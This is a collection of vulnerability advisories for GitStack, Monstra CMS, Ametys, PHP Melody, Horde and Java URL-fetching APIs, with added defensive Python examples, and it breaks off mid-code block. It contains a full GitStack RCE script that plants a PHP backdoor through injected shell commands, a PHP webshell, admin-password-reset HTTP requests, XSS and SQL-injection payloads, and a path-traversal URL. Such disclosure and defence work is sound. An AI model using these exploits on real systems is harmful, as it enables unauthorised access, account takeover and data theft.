import javax.xml.namespace.QName;
import javax.xml.ws.Service;

public class CreateService {
    public static void main(String[] args) {
        String wsdlURL = "ftp://maliciousftp:2121/test?wsdl";
        String namespace = "http://foo.bar.com/webservice";
        String serviceName = "SomeService";
        QName serviceQN = new QName(namespace, serviceName);
        try {
            Service service = Service.create(new URL(wsdlURL), serviceQN);
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}
```
## javax.xml.validation.Schema Proof of Concept
```java
import java.net.MalformedURLException;
import java.net.URL;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.SAXException;

public class NSchema {
    public static void main(String[] args) {
        SchemaFactory schemaFactory =
            SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
        URL url;
        try {
            url = new URL("ftp://maliciousftp:2121/schema");
            try {
                Schema schemaGrammar = schemaFactory.newSchema(url);
            } catch (SAXException e) {
                e.printStackTrace();
            }
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}
```
## javax.xml.JAXBContext Proof of Concept
```java
import java.net.MalformedURLException;
import java.net.URL;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;

public class UnMarsh {
    public static void main(String[] args) {
        JAXBContext jaxbContext = null;
        try {
            jaxbContext = JAXBContext.newInstance();
        } catch (JAXBException e) {
            e.printStackTrace();
        }
        URL url = null;
        try {
            url = new URL("ftp://maliciousftp:2121/test");
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
        Unmarshaller jaxbUnmarshaller = null;
        try {
            jaxbUnmarshaller = jaxbContext.createUnmarshaller();
        } catch (JAXBException e) {
            e.printStackTrace();
        }
        try {
            Object test = jaxbUnmarshaller.unmarshal(url);
        } catch (JAXBException e) {
            e.printStackTrace();
        }
    }
}
```
## java.net.JarURLConnection Proof of Concept
```java
import java.io.IOException;
import java.net.JarURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.jar.Manifest;

public class JavaUrl {
    public static void main(String[] args) {
        URL url = null;
        try {
            url = new URL("jar:ftp://maliciousftp:2121/duke.jar!/");
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
        JarURLConnection jarConnection = null;
        try {
            jarConnection = (JarURLConnection) url.openConnection();
            // Both timeouts are set here, yet the fetch still hangs (see above).
            jarConnection.setConnectTimeout(5000);
            jarConnection.setReadTimeout(5000);
        } catch (IOException e1) {
            e1.printStackTrace();
        }
        try {
            Manifest manifest = jarConnection.getManifest();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
```
## javax.imageio.ImageIO Proof of Concept
```java
import java.awt.Image;
import java.io.IOException;
import java.net.URL;
import javax.imageio.ImageIO;
import javax.swing.ImageIcon;
import javax.swing.JFrame;
import javax.swing.JLabel;

public class ImageReader {
    public static void main(String[] args) {
        Image image = null;
        try {
            URL url = new URL("ftp://maliciousftp:2121/test.jpg");
            image = ImageIO.read(url);
        } catch (IOException e) {
            e.printStackTrace();
        }
        JFrame frame = new JFrame();
        frame.setSize(300, 300);
        JLabel label = new JLabel(new ImageIcon(image));
        frame.add(label);
        frame.setVisible(true);
    }
}
```
## javax.swing.ImageIcon Proof of Concept
```java
import java.net.MalformedURLException;
import java.net.URL;
import javax.swing.ImageIcon;

public class ImageXcon {
    public static void main(String[] args) {
        URL imgURL;
        try {
            imgURL = new URL("ftp://maliciousftp:2121/test");
            String description = "";
            ImageIcon icon = new ImageIcon(imgURL, description);
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}
```
## javax.swing.text.html.StyleSheet Proof of Concept
```java
import java.net.MalformedURLException;
import java.net.URL;
import javax.swing.text.html.StyleSheet;

public class ImportStyla {
    public static void main(String[] args) {
        StyleSheet cs = new StyleSheet();
        URL url;
        try {
            url = new URL("ftp://maliciousftp:2121/test");
            cs.importStyleSheet(url);
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}
```
## java.net.URLConnection Concurrency-Related Denial of Service
A Thread Concurrency Denial of Service condition exists when java.net.URLConnection is used to fetch a file from an FTP server without specifying a connection timeout value.
The vulnerable functions are:
- javax.xml.parsers.SAXParser
- javax.xml.parsers.SAXParserFactory
- org.dom4j.Document
- org.dom4j.io.SAXReader
- javax.xml.parsers.DocumentBuilder
- javax.xml.parsers.DocumentBuilderFactory
The root cause in Apache Xerces is the class com.sun.org.apache.xerces.internal.impl.XMLEntityManager.
XMLEntityManager does not explicitly set a connection timeout on the connection object, so Java's default value of -1 (no timeout) applies, which leads to the Denial of Service condition explained below.
Example of code using the Apache Xerces library to fetch an XML file from an FTP server:
```java
[snip]
private void parseXmlFile() {
    // get the factory
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    try {
        // Using factory get an instance of document builder
        DocumentBuilder db = dbf.newDocumentBuilder();
        // parse using builder to get DOM representation of the XML file
        dom = db.parse("ftp://maliciousftpserver/test.xml"); // <- FTP URL controlled by the attacker
    } catch (ParserConfigurationException pce) {
        pce.printStackTrace();
    } catch (SAXException se) {
        se.printStackTrace();
    } catch (IOException ioe) {
        ioe.printStackTrace();
    }
}
[snip]
```
## SAXParser Proof of Concept
```java
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
UserHandler userhandler = new UserHandler();
saxParser.parse("ftp://badftpserver:2121/whatever.xml", userhandler);
```
## DOM4J / SAXReader Proof of Concept
```java
SAXReader reader = new SAXReader();
Document document = reader.read("ftp://badftpserver:2121/whatever.xml");
```
## JAVAX XML Parsers Proof of Concept
```java
DocumentBuilder db = dbf.newDocumentBuilder();
dom = db.parse("ftp://badftpserver:2121/whatever.xml");
```
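The common thread in all the PoCs above is that an attacker-supplied URL is fetched with no connect or read deadline, so a peer that stops answering pins a worker thread for good. The advisory's own fix is the Java one (`setConnectTimeout`/`setReadTimeout` on the connection); the following is an added example, not code from the advisory or from Oracle or Xerces, that shows the same two defences in Python so they can be run offline: a scheme allowlist that refuses `ftp://`, `jar:` and `file://` URLs outright, and a bounded-timeout fetch. The "silent server" is a constructed local stand-in for a peer that accepts the connection and never responds; the host names in the usage section are placeholders.

```python
"""Outbound fetch guard: scheme allowlist plus a hard deadline.

Added example (not from the advisory): a peer that accepts a connection and
then never answers should cost the application one timeout, not one thread.
"""
import socket
import threading
import time
import urllib.error
import urllib.request
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def check_url(url, allowed_schemes=ALLOWED_SCHEMES):
    """Raise ValueError unless the URL uses an allowed scheme and names a host.

    Nested schemes such as jar:ftp://... are rejected because urlsplit reports
    the outer scheme ('jar'), which is not in the allowlist.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in allowed_schemes:
        raise ValueError("scheme %r not allowed" % scheme)
    if not parts.hostname:
        raise ValueError("URL has no host")
    return url


def is_url_allowed(url):
    try:
        check_url(url)
        return True
    except ValueError:
        return False


def fetch_with_deadline(url, timeout=2.0, max_bytes=1 << 20):
    """Fetch `url` with a connect+read timeout; returns a small result dict."""
    check_url(url)
    started = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read(max_bytes)
        return {"ok": True, "bytes": len(body), "elapsed": time.monotonic() - started}
    except (urllib.error.URLError, OSError) as exc:
        # socket.timeout is an OSError; URLError wraps other transport errors.
        return {"ok": False, "reason": type(exc).__name__, "elapsed": time.monotonic() - started}


def start_silent_server():
    """Constructed peer: accepts connections and never sends a byte.

    Returns (port, stop_callable). Accepted sockets are held open so the client
    sees a connected but unresponsive server, the shape of the hang above.
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    held = []
    stop = threading.Event()

    def run():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
                held.append(conn)
            except socket.timeout:
                continue
        for c in held:
            c.close()
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1], stop.set


def timeout_demo_summary(timeout=1.0):
    """Fetch from the silent server; returns (ok, finished_within_bound)."""
    port, stop = start_silent_server()
    try:
        result = fetch_with_deadline("http://127.0.0.1:%d/test.xml" % port, timeout=timeout)
    finally:
        stop()
    return result["ok"], result["elapsed"] < timeout * 10 + 5


if __name__ == "__main__":
    for u in ("ftp://maliciousftp:2121/test.xml", "jar:ftp://maliciousftp:2121/duke.jar!/", "http://example.invalid/test.xml"):
        print(u, "allowed" if is_url_allowed(u) else "rejected")
    print("silent server fetch:", timeout_demo_summary(1.0))
```

Without the `timeout=` argument the same `urlopen` call blocks indefinitely, which is exactly the per-thread cost the advisory describes; with it, each hostile peer costs at most one timeout interval.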

## Vulnerability Summary
The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack, which can then be used to achieve unauthenticated remote code execution.
GitStack is “a software that lets you setup your own private Git server for Windows. This means that you create a leading edge versioning system without any prior Git knowledge. GitStack also makes it super easy to secure and keep your server up to date. GitStack is built on the top of the genuine Git for Windows and is compatible with any other Git clients. GitStack is completely free for small teams.”
## Credit
An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact GitStack starting October 17 2017; repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.
CVE: CVE-2018-5955
## Vulnerability details
User controlled input is not sufficiently filtered, allowing an unauthenticated attacker to add a user to the GitStack server by sending the following POST request:
```
http://IP/rest/user/
data={'username' : username, 'password' : password}
```
Once the attacker has added a user to the server, they can enable the web repository feature.
The attacker can then create a repository remotely and disable access to the new repository for anyone else.
Within the repository, the attacker is allowed to upload a backdoor and use it to execute code:
## Proof of Concept
```python
import requests
from requests.auth import HTTPBasicAuth
import os
import sys

ip = '192.168.15.102'
# What command you want to execute
command = "whoami"
repository = 'rce'
username = 'rce'
password = 'rce'
csrf_token = 'token'
user_list = []

print "[+] Get user list"
r = requests.get("http://{}/rest/user/".format(ip))
try:
    user_list = r.json()
    user_list.remove('everyone')
except:
    pass

if len(user_list) > 0:
    username = user_list[0]
    print "[+] Found user {}".format(username)
else:
    r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
    print "[+] Create user"
    if not "User created" in r.text and not "User already exist" in r.text:
        print "[-] Cannot create user"
        os._exit(0)

r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
    print "[+] Web repository already enabled"
else:
    print "[+] Enable web repository"
    r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
    print "r: %s" % r
    if not "Web interface successfully enabled" in r.text:
        print "[-] Cannot enable web interface"
        os._exit(0)

print "[+] Get repositories list"
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()
if len(repository_list) > 0:
    repository = repository_list[0]['name']
    print "[+] Found repository {}".format(repository)
else:
    print "[+] Create repository"
    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
    if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
        print "[-] Cannot create repository"
        os._exit(0)

print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
if not "added to" in r.text and not "has already" in r.text:
    print "[-] Cannot add user to repository"
    os._exit(0)

print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
    print "[-] Cannot remove access for anyone"
    os._exit(0)

print "[+] Create backdoor in PHP"
# The shell command is carried in the Basic-auth password. The quotes around
# $_POST['a'] and the backslashes of the Windows path were lost in extraction
# and are restored here (path assumed to be c:\GitStack\gitphp\exploit.php).
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\\GitStack\\gitphp\\exploit.php'))
print r.text.encode(sys.stdout.encoding, errors='replace')

print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')
```
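Every step of the PoC above is an ordinary HTTP request to a fixed REST endpoint, which makes the chain easy to spot in web-server access logs. The following is an added example, not from the advisory or from GitStack, that runs a small set of detection rules over constructed access-log lines in a combined-log-like format (the real GitStack server's log format is not given on the page, so the format and the IP addresses are assumptions): it flags the administrative REST calls made without a session, the removal of `everyone` from a repository, and POSTs to a PHP file under `/web/` other than `index.php`, and then reports sources that performed several distinct stages of the chain.

```python
"""Spot the GitStack attack chain in web-server access logs.

Added example (not from the advisory): the endpoints come from the PoC above;
the log format and sample lines are constructed for the example.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Method/endpoint pairs that should only ever come from an administrator.
ADMIN_ACTIONS = {
    ("POST", re.compile(r"^/rest/user/$")): "user created via REST",
    ("PUT", re.compile(r"^/rest/settings/general/webinterface/$")): "web interface toggled",
    ("POST", re.compile(r"^/rest/repository/$")): "repository created via REST",
    ("DELETE", re.compile(r"^/rest/repository/[^/]+/user/everyone/$")): "'everyone' removed from repository",
}
# A POST to any PHP file under /web/ other than the stock index.php is a dropped file being used.
WEB_DROP_RE = re.compile(r"^/web/(?!index\.php)[^?]+\.php")


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines):
    """Return (findings, stages): findings is a list of (source_ip, label),
    stages maps each source IP to the number of distinct chain stages it performed."""
    findings = []
    stages = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as benign
        for (method, pat), label in ADMIN_ACTIONS.items():
            if rec["method"] == method and pat.match(rec["path"]):
                findings.append((rec["ip"], label))
                stages[rec["ip"]].add(label)
        if rec["method"] == "POST" and WEB_DROP_RE.match(rec["path"]):
            findings.append((rec["ip"], "POST to non-stock PHP file under /web/: %s" % rec["path"]))
            stages[rec["ip"]].add("webshell")
    return findings, {ip: len(s) for ip, s in stages.items()}


def chained_sources(lines, min_steps=3):
    """IPs that performed at least `min_steps` distinct stages of the chain."""
    _, counts = analyze(lines)
    return sorted(ip for ip, n in counts.items() if n >= min_steps)


# Constructed sample log (not real traffic); 10.0.0.5 replays the PoC, 10.0.0.9 is a normal user.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2018:10:00:01 +0000] "GET /rest/user/ HTTP/1.1" 200 12',
    '10.0.0.5 - - [16/Feb/2018:10:00:02 +0000] "POST /rest/user/ HTTP/1.1" 200 14',
    '10.0.0.5 - - [16/Feb/2018:10:00:03 +0000] "PUT /rest/settings/general/webinterface/ HTTP/1.1" 200 36',
    '10.0.0.5 - - [16/Feb/2018:10:00:04 +0000] "POST /rest/repository/ HTTP/1.1" 200 45',
    '10.0.0.5 - - [16/Feb/2018:10:00:05 +0000] "DELETE /rest/repository/rce/user/everyone/ HTTP/1.1" 200 30',
    '10.0.0.5 - rce [16/Feb/2018:10:00:06 +0000] "GET /web/index.php?p=rce.git&a=summary HTTP/1.1" 200 2048',
    '10.0.0.5 - - [16/Feb/2018:10:00:07 +0000] "POST /web/exploit.php HTTP/1.1" 200 20',
    '10.0.0.9 - alice [16/Feb/2018:10:05:00 +0000] "GET /web/index.php?p=docs.git HTTP/1.1" 200 5120',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG)[0]:
        print(ip, finding)
    print("chained:", chained_sources(SAMPLE_LOG))
```

The per-source stage count is what turns individually explainable events (an admin really might create a user) into a high-confidence signal: a single source walking three or more stages within a short window is the PoC's footprint.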

## Vulnerabilities Summary
The following advisory describes a vulnerability found in Monstra CMS.
Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.”
The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.
## Credit
An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
We were not able to get the vendor to respond in any way. The software appears to have been abandoned without support, though this is not an official status on their site (the last official patch was released on 2012-11-29); the GitHub repository appears a bit more active (last commit from 2 years ago).
Without any vendor response, the researcher was kind enough to create a patch that addresses this bug; it's available here: https://github.com/monstra-cms/monstra/issues/426
CVE: CVE-2017-18048
## Vulnerabilities details
An editor can upload files to the Monstra CMS and access them by clicking on them from the administrator portal. The default setup of Monstra CMS only allows uploading files with certain extensions, forbidding all types of executable files that are listed in monstra\plugins\box\filesmanager\filesmanager.admin.php. However, simply uploading a php file with a “PHP” (all characters uppercase) extension bypasses this mechanism and allows an attacker to execute shell commands on the server.
## Proof of Concept
Steps to Reproduce:
1. Log in with valid credentials of an Editor
2. Select the Files option from the Content drop-down menu
3. Upload a file with a PHP (uppercase) extension containing the code below:
```php
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>
```
4. Click on Upload
5. Once the file is uploaded, click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami, time, date etc.
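The bypass works because the upload filter compares the extension case-sensitively against a list of forbidden ones. The following is an added example, not Monstra's code, that puts a checker with that flaw beside a hardened one: the hardened version lowercases the name, strips a trailing dot or space, and inspects every extension segment, so `shell.PHP` and `shell.php.jpg` are both refused. The allow-list and deny-list contents are assumptions for the example, not the contents of `filesmanager.admin.php`.

```python
"""Case-insensitive upload extension checks: the flaw beside the fix.

Added example (not Monstra's code). The lists below are constructed for the
example, not taken from the product's configuration.
"""
import posixpath

# Constructed deny-list of the kind the flawed filter uses (lowercase entries only).
FORBIDDEN = {"php", "phtml", "php3", "php4", "php5", "phar", "cgi", "pl", "py", "sh", "exe"}
# Constructed allow-list for the hardened check.
ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "zip"}


def flawed_is_allowed(filename):
    """Deny-list with a case-sensitive comparison: the behaviour described above."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in FORBIDDEN


def hardened_is_allowed(filename):
    """Allow-list, case-insensitive, every extension segment inspected."""
    # Take only the final path component, drop trailing dots/spaces that some
    # filesystems ignore, and compare in lowercase.
    name = posixpath.basename(filename.replace("\\", "/")).rstrip(". ").lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension at all, or a dot-file such as .htaccess
    exts = parts[1:]
    if any(e in FORBIDDEN for e in exts):
        return False  # catches shell.php.jpg style double extensions
    return exts[-1] in ALLOWED


def compare(filenames):
    """Return {filename: (flawed_result, hardened_result)} for a batch of names."""
    return {f: (flawed_is_allowed(f), hardened_is_allowed(f)) for f in filenames}


if __name__ == "__main__":
    samples = ["photo.jpg", "shell.php", "shell.PHP", "shell.php.jpg", "notes.TXT.", ".htaccess"]
    for f, (flawed, hardened) in compare(samples).items():
        print("%-16s flawed=%-5s hardened=%s" % (f, flawed, hardened))
```

An allow-list is preferable to a deny-list here regardless of case handling: the deny-list has to anticipate every executable extension the web server might honour, while the allow-list only has to name the few types the application actually needs.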

## Vulnerability Summary
The following advisory describes a password reset vulnerability found in Ametys CMS version 4.0.2.
Ametys is “a free and open source content management system (CMS) written in Java. It is based on JSR-170 for content storage, Open Social for gadget rendering and an XML oriented framework.”
## Credit
An independent security researcher, Jose Luis, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Ametys has released patches to address this vulnerability in Ametys version 4.0.3.
For more details: https://issues.ametys.org/browse/RUNTIME-2582
CVE-2017-16935
## Vulnerability details
User controlled input is not sufficiently sanitized. An unauthenticated user can perform administrative operations without proper authorization.
Ametys CMS only checks authorization if the request path includes /cms/.
Because of that, the password of any user, including administrator users, can be reset.
## Proof of Concept
By sending the following POST request, we can obtain the list of users:
```http
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Cookie: JSESSIONID=
Connection: close

content={"0":{"pluginOrWorkspace":"core","responseType":"text","url":"users/search.json","parameters":{"contexts":["/sites/www","/sites-fo/www"],"criteria":"","limit":100,"page":1,"start":0}}}}&context.parameters={}
```
The server then responds with:
```http
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:15 GMT
Connection: close
Content-Length: 1875

<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200" duration="946">{"users":[{"firstname":"Simple","sortablename":"Contributor Simple","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Simple Contributor","login":"contrib","directory":"SQL database","email":"contrib@example.com","lastname":"Contributor"},{"firstname":"User1","sortablename":"User1 User1","populationLabel":"FO Demo Users","populationId":"fo-demo-users","fullname":"User1 User1","login":"user1@ametys.org","directory":"SQL database","email":"user1@ametys.org","lastname":"User1"},{"firstname":"User3","sortablename":"User3 User3","populationLabel":"FO Demo Users","populationId":"fo-demo-users","fullname":"User3 User3","login":"user3@ametys.org","directory":"SQL database","email":"user3@ametys.org","lastname":"User3"},{"firstname":"Webmaster","sortablename":"User Webmaster","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Webmaster User","login":"webmaster","directory":"SQL database","email":"webmaster@example.com","lastname":"User"},{"firstname":"Manager","sortablename":"User Manager","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Manager User","login":"manager","directory":"SQL database","email":"manager@example.com","lastname":"User"},{"firstname":"Administrator","sortabl ename":"User Administrator","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Administrator User","login":"admin","directory":"SQL database","email":"admin@example.com","lastname":"User"},{"firstname":"User2","sortablename":"User2 User2","populationLabel":"FO Demo Users","populationId":"fo-demo-users","fullname":"User2 User2","login":"user2@ametys.org","directory":"SQL database","email":"user2@ametys.org","lastname":"User2"}]}</response></responses>
```
Note the values of the “populationId” and “login” fields; they are needed for the next request.
Now we perform another request to change the password of the admin user:
```http
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 345
Cookie: JSESSIONID=
Connection: close

content={"0":{"pluginOrWorkspace":"core-ui","responseType":"text","url":"client-call","parameters":{"role":"org.ametys.plugins.core.user.UserDAO","methodName":"editUser","parameters":["ametys_demo_users",{"login":"admin","password":"MYNEWPASSWORD","firstname":"Administrator","lastname":"User","email":"admin@example.com"}]}}}&context.parameters={}
```
Once we have performed the request, the response is:
```http
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:59 GMT
Connection: close
Content-Length: 374

<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200" duration="110">{"firstname":"Administrator","sortablename":"User Administrator","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Administrator User","login":"admin","directory":"SQL database","email":"admin@example.com","lastname":"User"}</response></responses>
```
Now you can log in as Admin with password MYNEWPASSWORD
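The root cause reported above is an authorization rule keyed on a path prefix: only requests containing `/cms/` were checked, while the same server-side method was reachable through `/plugins/core-ui/servercomm/messages.xml` with an empty `JSESSIONID`. The following is an added example, not Ametys code, contrasting that prefix rule with a default-deny policy: every request needs a session unless its normalized path is explicitly public, and the path is normalized first so that dot segments, duplicate slashes or upper-case letters cannot change the decision. The route paths come from the requests shown above; the public route list is an assumption for the example.

```python
"""Default-deny authorization keyed on the normalized request path.

Added example (not Ametys code). PUBLIC_ROUTES and PUBLIC_PREFIXES are
constructed for the example, not the product's real configuration.
"""
import posixpath
from urllib.parse import urlsplit

# Constructed allow-list of routes that may be served without a session.
PUBLIC_ROUTES = {"/", "/index.html", "/login"}
PUBLIC_PREFIXES = ("/plugins/core-ui/resources/",)


def normalize_path(raw_path):
    """Drop the query string, collapse dot segments and duplicate slashes, lower-case."""
    path = urlsplit(raw_path).path or "/"
    norm = posixpath.normpath("/" + path.lstrip("/"))
    norm = "/" + norm.lstrip("/")          # normpath keeps a leading "//"; collapse it
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"                        # keep a trailing slash, it matters for prefixes
    return norm.lower()


def flawed_requires_auth(raw_path):
    """The reported behaviour: only paths containing /cms/ are protected."""
    return "/cms/" in raw_path


def requires_auth(raw_path, public_routes=PUBLIC_ROUTES, public_prefixes=PUBLIC_PREFIXES):
    """Default deny: a request needs a session unless its normalized path is public."""
    path = normalize_path(raw_path)
    if path in public_routes:
        return False
    if any(path.startswith(p) for p in public_prefixes):
        return False
    return True


def decide(raw_path, session_id, policy=requires_auth):
    """Return 'allow' or 'deny' for a request given its (possibly empty) session id."""
    if policy(raw_path) and not session_id:
        return "deny"
    return "allow"


if __name__ == "__main__":
    # The password-reset request above carries an empty JSESSIONID cookie.
    req = "/plugins/core-ui/servercomm/messages.xml"
    print("flawed  :", decide(req, "", flawed_requires_auth))
    print("hardened:", decide(req, "", requires_auth))
```

The policy decides only whether a session is required; whether the session's user may call `UserDAO.editUser` on another account is a separate, per-method check that a default-deny policy makes impossible to skip by accident.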

## Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in PHP Melody version 2.7.3.
PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on.
A truly great CMS should help you save time and make your life easier not complicate it. Nobody enjoys spending time and money on inferior solutions. If you value your time, don't settle for anything but the best video CMS with a proven track record, constant support and updates.”
The vulnerabilities found in PHP Melody are:
- Stored PreAuth XSS that leads to administrator account takeover
- SQL Injection (1)
- SQL Injection (2)
## Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
PHP Melody has released patches to address this vulnerability.
For more information: http://www.phpsugar.com/blog/2017/10/php-melody-v2-7-3-maintenance-release/
CVE: CVE-2017-15578, CVE-2017-15579
## Vulnerabilities details
### Stored PreAuth XSS that leads to administrator account takeover
User controlled input is not sufficiently sanitized: by sending a POST request to page_manager.php with the following parameters (the vulnerable parameter is page_title)
```
page_manager.php?do=new&id=&author=&showinmenu=0&meta_keywords=555-555-0199@example.com&status=0&submit=Publish&page_name=Peter+Winter&page_title=408b7<script>alert(1)<%2fscript>f2faf
```
an attacker can trigger the vulnerability; when an administrator, moderator, editor or anyone with privileges visits the admin page /admin/pages.php?page=1, the payload is triggered and the alert is executed.
### SQL Injection (1)
User controlled input is not sufficiently sanitized: a POST request to /phpmelody/admin/edit_category.php with the following parameters
```
category=3&meta_keywords=555-555-0199@example.com&tag=categoryone&save=Save$name=Sample+Category+%231&image='&meta_title=555-555-0199@example.com
```
triggers the injection. The vulnerable parameter is the POST “image” parameter. Sending a single quote character (') is enough to verify it: the server responds with an SQL error. SQL queries can be injected here to extract data.
This attack requires an admin, moderator or editor to visit a malicious website that submits the form with a malicious “image” parameter carrying the injection.
### SQL Injection (2)
This SQL Injection is in a cookie value and can be exploited without any user interaction.
The cookie value “aa_pages_per_page” is the vulnerable parameter, and time based SQL Injection techniques can be used to verify it.
The payload we used, AND benchmark(20000000%2csha1(1)), makes the server sleep for a long time (5-20 seconds).

## Vulnerability Summary
The following advisory describes an unauthorized file download vulnerability found in Horde Groupware version 5.2.21.
Horde Groupware Webmail Edition is “a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project. Horde Groupware Webmail Edition bundles the separately available applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo, Gollem, and Trean.”
## Credit
An independent security researcher, Juan Pablo Lopez Yacubian, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Horde Groupware was informed of the vulnerability, to which they responded with:
“this has already been reported earlier by someone else, and is already fixed in the latest Gollem and Horde Groupware releases.
Besides that, it's not sufficient to have a list of the server's users, you also need to exactly know the file name and path that you want to download. Finally, this only works on certain backends, where Horde alone is responsible for authentication, i.e. it won't work with backends that require explicit authentication.”
CVE: CVE-2017-15235
## Vulnerability details
User controlled input is not sufficiently sanitized when passed to the File Manager (gollem) module (version 3.0.11).
The “fn” parameter does not validate certain meta characters, which allows the requested file or filesystem path to be downloaded without credentials.
It is only necessary to know the username and the file name.
## Proof of Concept
```
user = the username in Horde
/   = the meta character / at the start of the fn parameter
/services/download/?app=gollem&dir=%2Fhome%2Fuser&backend=sqlhome&fn=/test.php
```
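The meta character at work above is the leading `/`: a file name that begins with it is absolute, and the usual path-joining calls then discard the user's directory entirely. The following is an added example, not Horde or Gollem code, that shows that behaviour with `posixpath.join` beside a `safe_join` that keeps the resolved path inside the base directory. It works purely lexically (no filesystem access), URL-decodes the parameter first so that `%2F` is treated like `/`, and refuses absolute names, `..` escapes and NUL bytes. The base directory and file names are constructed for the example.

```python
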